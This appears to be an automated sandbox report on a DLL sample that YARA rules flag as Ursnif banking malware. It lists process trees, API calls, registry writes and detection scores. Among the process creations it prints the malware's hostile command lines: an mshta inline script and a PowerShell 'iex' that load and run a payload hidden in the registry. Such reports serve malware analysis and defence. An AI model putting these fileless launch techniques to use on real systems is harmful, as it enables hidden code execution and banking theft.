Source: WerFault.exe, 00000004.00000003.659243979.0000000005012000.00000004.00000001.sdmp	String found in binary or memory: http://crl.microsoft
Source: loaddll32.exe, 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.880565935.0000000001060000.00000040.00000001.sdmp, powershell.exe, 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001E.00000002.894782181.0000026F5BCBE000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001E.00000002.894428484.0000026F5BAB1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001E.00000002.894782181.0000026F5BCBE000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001E.00000002.894782181.0000026F5BCBE000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443

Source: unknown

HTTPS traffic detected: 104.16.249.249:443 -> 192.168.2.4:49794 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.704190908.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.704338669.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.881249179.0000000000146000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.804269082.0000000004B5C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.704231467.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.704303673.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.1038694426.0000027D4F836000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.704163545.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.880565935.0000000001060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1047039764.0000000004DD6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.868598752.000001EB11270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.704264515.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.704123248.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.877735219.00000000030F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.704325242.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5964, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4552, type: MEMORY

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 1_2_004225C8 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,

1_2_004225C8

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00449950 GetKeyboardState,

0_2_00449950

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.704190908.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.704338669.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.881249179.0000000000146000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.804269082.0000000004B5C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.704231467.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.704303673.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.1038694426.0000027D4F836000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.704163545.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.880565935.0000000001060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1047039764.0000000004DD6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.868598752.000001EB11270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.704264515.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.704123248.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.877735219.00000000030F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.704325242.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5964, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4552, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Show sources

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0044C8CC NtdllDefWindowProc_A,GetCapture,	0_2_0044C8CC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0042863C NtdllDefWindowProc_A,	0_2_0042863C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0044281C GetSubMenu,SaveDC,RestoreDC,72E7B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,	0_2_0044281C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00439348 NtdllDefWindowProc_A,	0_2_00439348
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00439AF0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	0_2_00439AF0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00439BA0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	0_2_00439BA0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02C914E8 NtCreateSection,memset,	0_2_02C914E8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02C9183B NtMapViewOfSection,	0_2_02C9183B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02C922C5 NtQueryVirtualMemory,	0_2_02C922C5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02F372D8 NtMapViewOfSection,	0_2_02F372D8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02F31371 GetProcAddress,NtCreateSection,memset,	0_2_02F31371
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02F37507 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_02F37507
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02F3B2F1 NtQueryVirtualMemory,	0_2_02F3B2F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0044C8CC NtdllDefWindowProc_A,GetCapture,	1_2_0044C8CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0042863C NtdllDefWindowProc_A,	1_2_0042863C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0044281C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,	1_2_0044281C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00439348 NtdllDefWindowProc_A,	1_2_00439348
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00439AF0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	1_2_00439AF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00439BA0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	1_2_00439BA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_045422C5 NtQueryVirtualMemory,	1_2_045422C5
Source: C:\Windows\explorer.exe	Code function: 37_2_04DA14D0 NtQueryInformationProcess,	37_2_04DA14D0
Source: C:\Windows\explorer.exe	Code function: 37_2_04DC20B4 NtQueryInformationProcess,	37_2_04DC20B4
Source: C:\Windows\explorer.exe	Code function: 37_2_04DC4064 NtMapViewOfSection,	37_2_04DC4064
Source: C:\Windows\explorer.exe	Code function: 37_2_04DA7008 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,	37_2_04DA7008
Source: C:\Windows\explorer.exe	Code function: 37_2_04DA5DF4 RtlAllocateHeap,NtCreateSection,	37_2_04DA5DF4
Source: C:\Windows\explorer.exe	Code function: 37_2_04DC7278 NtWriteVirtualMemory,	37_2_04DC7278
Source: C:\Windows\explorer.exe	Code function: 37_2_04DA527C NtAllocateVirtualMemory,	37_2_04DA527C
Source: C:\Windows\explorer.exe	Code function: 37_2_04DB6A74 NtQuerySystemInformation,	37_2_04DB6A74
Source: C:\Windows\explorer.exe	Code function: 37_2_04DB2FD0 NtQueryInformationProcess,	37_2_04DB2FD0
Source: C:\Windows\explorer.exe	Code function: 37_2_04DBFF54 NtReadVirtualMemory,	37_2_04DBFF54
Source: C:\Windows\explorer.exe	Code function: 37_2_04DAEF1C NtSetContextThread,NtUnmapViewOfSection,NtClose,	37_2_04DAEF1C
Source: C:\Windows\explorer.exe	Code function: 37_2_04DB4B24 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,FindCloseChangeNotification,	37_2_04DB4B24
Source: C:\Windows\explorer.exe	Code function: 37_2_04DDA002 NtProtectVirtualMemory,NtProtectVirtualMemory,	37_2_04DDA002
Source: C:\Windows\System32\control.exe	Code function: 38_2_00117008 NtQueryInformationToken,NtQueryInformationToken,NtClose,	38_2_00117008
Source: C:\Windows\System32\control.exe	Code function: 38_2_00134064 NtMapViewOfSection,	38_2_00134064
Source: C:\Windows\System32\control.exe	Code function: 38_2_001320B4 NtQueryInformationProcess,	38_2_001320B4
Source: C:\Windows\System32\control.exe	Code function: 38_2_001114D0 NtQueryInformationProcess,	38_2_001114D0
Source: C:\Windows\System32\control.exe	Code function: 38_2_00115DF4 NtCreateSection,	38_2_00115DF4
Source: C:\Windows\System32\control.exe	Code function: 38_2_00137278 NtWriteVirtualMemory,	38_2_00137278
Source: C:\Windows\System32\control.exe	Code function: 38_2_0011527C NtAllocateVirtualMemory,	38_2_0011527C
Source: C:\Windows\System32\control.exe	Code function: 38_2_0011EF1C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,	38_2_0011EF1C
Source: C:\Windows\System32\control.exe	Code function: 38_2_00124B24 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	38_2_00124B24
Source: C:\Windows\System32\control.exe	Code function: 38_2_0012FF54 NtReadVirtualMemory,	38_2_0012FF54
Source: C:\Windows\System32\control.exe	Code function: 38_2_0014A002 NtProtectVirtualMemory,NtProtectVirtualMemory,	38_2_0014A002

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0044281C	0_2_0044281C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00433840	0_2_00433840
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02C920A4	0_2_02C920A4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02F323FC	0_2_02F323FC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02F3936B	0_2_02F3936B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_0044281C	1_2_0044281C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00433840	1_2_00433840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_045420A4	1_2_045420A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_04521618	1_2_04521618
Source: C:\Windows\explorer.exe	Code function: 37_2_04DC0CDC	37_2_04DC0CDC
Source: C:\Windows\explorer.exe	Code function: 37_2_04DBA0C4	37_2_04DBA0C4
Source: C:\Windows\explorer.exe	Code function: 37_2_04DA58FC	37_2_04DA58FC
Source: C:\Windows\explorer.exe	Code function: 37_2_04DB2080	37_2_04DB2080
Source: C:\Windows\explorer.exe	Code function: 37_2_04DAA8B8	37_2_04DAA8B8
Source: C:\Windows\explorer.exe	Code function: 37_2_04DB059C	37_2_04DB059C
Source: C:\Windows\explorer.exe	Code function: 37_2_04DBE178	37_2_04DBE178
Source: C:\Windows\explorer.exe	Code function: 37_2_04DB3520	37_2_04DB3520
Source: C:\Windows\explorer.exe	Code function: 37_2_04DC36F4	37_2_04DC36F4
Source: C:\Windows\explorer.exe	Code function: 37_2_04DBAE94	37_2_04DBAE94
Source: C:\Windows\explorer.exe	Code function: 37_2_04DA16B4	37_2_04DA16B4
Source: C:\Windows\explorer.exe	Code function: 37_2_04DA7A0C	37_2_04DA7A0C
Source: C:\Windows\explorer.exe	Code function: 37_2_04DB537C	37_2_04DB537C
Source: C:\Windows\explorer.exe	Code function: 37_2_04DAEF1C	37_2_04DAEF1C
Source: C:\Windows\explorer.exe	Code function: 37_2_04DC40F8	37_2_04DC40F8
Source: C:\Windows\explorer.exe	Code function: 37_2_04DA3088	37_2_04DA3088
Source: C:\Windows\explorer.exe	Code function: 37_2_04DBE87C	37_2_04DBE87C
Source: C:\Windows\explorer.exe	Code function: 37_2_04DC5010	37_2_04DC5010
Source: C:\Windows\explorer.exe	Code function: 37_2_04DA4828	37_2_04DA4828
Source: C:\Windows\explorer.exe	Code function: 37_2_04DC2994	37_2_04DC2994
Source: C:\Windows\explorer.exe	Code function: 37_2_04DAD590	37_2_04DAD590
Source: C:\Windows\explorer.exe	Code function: 37_2_04DB154C	37_2_04DB154C
Source: C:\Windows\explorer.exe	Code function: 37_2_04DAB170	37_2_04DAB170
Source: C:\Windows\explorer.exe	Code function: 37_2_04DA6168	37_2_04DA6168
Source: C:\Windows\explorer.exe	Code function: 37_2_04DADD18	37_2_04DADD18
Source: C:\Windows\explorer.exe	Code function: 37_2_04DAAD03	37_2_04DAAD03
Source: C:\Windows\explorer.exe	Code function: 37_2_04DB8504	37_2_04DB8504
Source: C:\Windows\explorer.exe	Code function: 37_2_04DB0134	37_2_04DB0134
Source: C:\Windows\explorer.exe	Code function: 37_2_04DA66D0	37_2_04DA66D0
Source: C:\Windows\explorer.exe	Code function: 37_2_04DA1AD0	37_2_04DA1AD0
Source: C:\Windows\explorer.exe	Code function: 37_2_04DB6E88	37_2_04DB6E88
Source: C:\Windows\explorer.exe	Code function: 37_2_04DC1A30	37_2_04DC1A30
Source: C:\Windows\explorer.exe	Code function: 37_2_04DABF6C	37_2_04DABF6C
Source: C:\Windows\explorer.exe	Code function: 37_2_04DAB730	37_2_04DAB730
Source: C:\Windows\explorer.exe	Code function: 37_2_04DB3F2C	37_2_04DB3F2C
Source: C:\Windows\explorer.exe	Code function: 37_2_04DACF24	37_2_04DACF24
Source: C:\Windows\System32\control.exe	Code function: 38_2_00130CDC	38_2_00130CDC
Source: C:\Windows\System32\control.exe	Code function: 38_2_0012059C	38_2_0012059C
Source: C:\Windows\System32\control.exe	Code function: 38_2_0011EF1C	38_2_0011EF1C
Source: C:\Windows\System32\control.exe	Code function: 38_2_00135010	38_2_00135010
Source: C:\Windows\System32\control.exe	Code function: 38_2_00114828	38_2_00114828
Source: C:\Windows\System32\control.exe	Code function: 38_2_0012E87C	38_2_0012E87C
Source: C:\Windows\System32\control.exe	Code function: 38_2_00122080	38_2_00122080
Source: C:\Windows\System32\control.exe	Code function: 38_2_00113088	38_2_00113088
Source: C:\Windows\System32\control.exe	Code function: 38_2_0011A8B8	38_2_0011A8B8
Source: C:\Windows\System32\control.exe	Code function: 38_2_0012A0C4	38_2_0012A0C4
Source: C:\Windows\System32\control.exe	Code function: 38_2_001340F8	38_2_001340F8
Source: C:\Windows\System32\control.exe	Code function: 38_2_001158FC	38_2_001158FC
Source: C:\Windows\System32\control.exe	Code function: 38_2_0011DD18	38_2_0011DD18
Source: C:\Windows\System32\control.exe	Code function: 38_2_0011AD03	38_2_0011AD03
Source: C:\Windows\System32\control.exe	Code function: 38_2_00128504	38_2_00128504
Source: C:\Windows\System32\control.exe	Code function: 38_2_00120134	38_2_00120134
Source: C:\Windows\System32\control.exe	Code function: 38_2_00123520	38_2_00123520
Source: C:\Windows\System32\control.exe	Code function: 38_2_0012154C	38_2_0012154C
Source: C:\Windows\System32\control.exe	Code function: 38_2_0011B170	38_2_0011B170
Source: C:\Windows\System32\control.exe	Code function: 38_2_0012E178	38_2_0012E178
Source: C:\Windows\System32\control.exe	Code function: 38_2_00116168	38_2_00116168
Source: C:\Windows\System32\control.exe	Code function: 38_2_0011D590	38_2_0011D590
Source: C:\Windows\System32\control.exe	Code function: 38_2_00132994	38_2_00132994
Source: C:\Windows\System32\control.exe	Code function: 38_2_00117A0C	38_2_00117A0C
Source: C:\Windows\System32\control.exe	Code function: 38_2_00131A30	38_2_00131A30
Source: C:\Windows\System32\control.exe	Code function: 38_2_0012AE94	38_2_0012AE94
Source: C:\Windows\System32\control.exe	Code function: 38_2_00126E88	38_2_00126E88
Source: C:\Windows\System32\control.exe	Code function: 38_2_001116B4	38_2_001116B4
Source: C:\Windows\System32\control.exe	Code function: 38_2_00111AD0	38_2_00111AD0
Source: C:\Windows\System32\control.exe	Code function: 38_2_001166D0	38_2_001166D0
Source: C:\Windows\System32\control.exe	Code function: 38_2_001336F4	38_2_001336F4
Source: C:\Windows\System32\control.exe	Code function: 38_2_0011B730	38_2_0011B730
Source: C:\Windows\System32\control.exe	Code function: 38_2_0011CF24	38_2_0011CF24
Source: C:\Windows\System32\control.exe	Code function: 38_2_00123F2C	38_2_00123F2C
Source: C:\Windows\System32\control.exe	Code function: 38_2_0012537C	38_2_0012537C

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 00403EBC appears 75 times
Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 00406224 appears 61 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 00403EBC appears 77 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 00406224 appears 61 times

Source: unknown

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4576 -s 756

Source: yytr.dll

Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST

Source: maejgtwh.dll.35.dr	Static PE information: No import functions for PE file found
Source: qxfma03s.dll.33.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: yytr.dll

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winDLL@47/76@10/3

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00420AE8 GetLastError,FormatMessageA,

0_2_00420AE8

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_004085C6 GetDiskFreeSpaceA,

0_2_004085C6

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_02F382EB CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

0_2_02F382EB

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00416AE4 FindResourceA,

0_2_00416AE4

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{0A3DC979-6AC5-11EB-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{305FBD52-CFE8-E23F-D964-73361DD857CA}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{7C7FA6C6-ABD4-0EE2-1570-0F2219A4B376}
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4576
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{8C972E34-7B6D-9E84-6580-DFB269B48306}

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B01.tmp

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\yytr.dll',#1

Source: yytr.dll	Virustotal: Detection: 43%
Source: yytr.dll	ReversingLabs: Detection: 39%

Source: loaddll32.exe

String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\yytr.dll'
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\yytr.dll',#1
Source: unknown	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4576 -s 756
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6556 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5988 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:82956 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
